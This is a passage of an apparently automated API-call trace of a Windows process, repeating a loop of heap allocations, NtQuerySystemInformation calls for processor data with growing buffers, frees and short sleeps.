Flags=0x0, Size=0x1000) returned 0x295d900 [0270.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0270.027] Sleep (dwMilliseconds=0x110) [0270.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0270.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0270.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0270.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0270.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0270.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0270.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0270.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0270.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0270.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0270.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0270.051] Sleep (dwMilliseconds=0x110) [0270.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0270.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0270.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0270.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0270.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0270.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0270.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0270.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0270.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0270.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0270.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0270.068] Sleep (dwMilliseconds=0x110) [0270.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0270.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0270.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0270.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0270.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0270.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0270.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0270.084] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0270.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0270.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0270.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0270.085] Sleep (dwMilliseconds=0x110) [0270.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0270.115] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0270.116] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0270.116] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0270.116] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0270.116] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.117] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0270.117] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0270.117] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0270.117] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0270.120] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0270.121] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0270.121] Sleep (dwMilliseconds=0x110) [0270.180] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0270.181] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.181] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0270.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0270.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0270.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0270.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0270.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0270.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0270.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0270.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0270.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0270.188] Sleep (dwMilliseconds=0x110) [0270.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0270.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0270.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0270.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0270.443] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0270.443] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.444] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0270.444] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0270.444] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0270.445] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0270.445] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0270.446] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0270.446] Sleep (dwMilliseconds=0x110) [0270.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0270.646] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0270.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0270.647] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0270.648] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0270.648] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.649] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0270.649] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0270.649] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0270.650] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0270.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0270.711] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0270.711] Sleep (dwMilliseconds=0x110) [0270.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0270.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0270.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0270.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0270.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0270.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0270.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0270.849] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0270.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0270.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0270.850] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0270.850] Sleep (dwMilliseconds=0x110) [0271.287] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0271.287] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.287] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0271.287] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0271.287] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.288] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0271.288] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0271.288] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.288] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0271.288] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0271.288] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0271.289] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0271.289] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0271.289] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0271.289] Sleep (dwMilliseconds=0x110) [0271.336] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0271.336] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.337] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0271.340] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0271.340] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0271.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0271.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0271.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0271.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0271.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0271.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0271.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0271.344] Sleep (dwMilliseconds=0x110) [0271.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0271.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0271.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0271.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0271.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0271.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0271.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0271.912] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0271.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0271.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0271.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0271.912] Sleep (dwMilliseconds=0x110) [0271.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0271.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0271.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0271.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0271.928] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0271.928] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.929] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0271.929] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0271.929] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0271.929] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0271.929] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0271.930] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0271.930] Sleep (dwMilliseconds=0x110) [0271.960] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0271.960] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0271.960] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0271.961] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.961] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0271.961] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0271.961] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0271.961] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0271.962] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0271.962] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0271.962] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0271.962] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0271.962] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0271.962] Sleep (dwMilliseconds=0x110) [0272.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0272.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0272.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0272.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0272.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0272.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0272.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0272.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.130] HeapFree 